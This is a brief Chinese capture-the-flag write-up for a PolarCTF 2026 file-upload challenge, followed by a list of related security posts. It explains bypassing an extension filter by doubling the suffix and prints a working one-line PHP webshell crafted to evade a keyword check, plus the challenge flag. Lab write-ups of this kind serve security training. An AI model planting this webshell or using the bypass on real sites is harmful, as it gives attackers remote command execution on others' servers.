【PolarCTF2026年春季挑战赛】GET

直接上传一个php试试

文件名后缀双写可以绕过

可以解析,我们上传一句话木马

提示出现了$_POST['cmd']

那么用下面的webshell,避免POST和cmd一起出现

php 复制代码
<?php $x = $_POST; @eval($x['cmd']); ?>

上传成功,访问一下

得到flag{73121d2832f501293a2e661c4d3a082f}

相关推荐
m0_7381207211 小时前
应急响应(重点)——记一次某公司流量应急溯源分析(附带下载链接)
服务器·前端·数据库·安全·web安全·网络安全
聚铭网络14 小时前
搞安全的谁还没点兜底绝活?——五一劳动节,致敬「网安劳动者」
网络安全
图码17 小时前
一文搞懂如何判断字符串是否为Pangram(全字母句)
数据结构·算法·网络安全·数字雕刻·ping++
HackTwoHub18 小时前
可视化未授权访问批量探测工具、支持批量目标、并发扫描、SOCKS5 全局代理、CSV 导出
linux·windows·macos·网络安全·网络攻击模型
YOU OU19 小时前
网路原理(各层协议)
网络安全
旺仔Sec19 小时前
国光sqlsec_upload-labs靶场渗透测试通关解析教程总结
web安全·网络安全
战神/calmness21 小时前
代码审计工具
网络安全
深邃-21 小时前
【Web安全】-云服务器与Docker(2):Docker镜像操作,Docker容器操作,Docker搭建漏洞靶场
linux·服务器·web安全·网络安全·docker
谪星·阿凯21 小时前
内网信息收集技术博客
安全·web安全·网络安全·php
大方子1 天前
【PolarCTF】PHP反序列化初试
网络安全·polarctf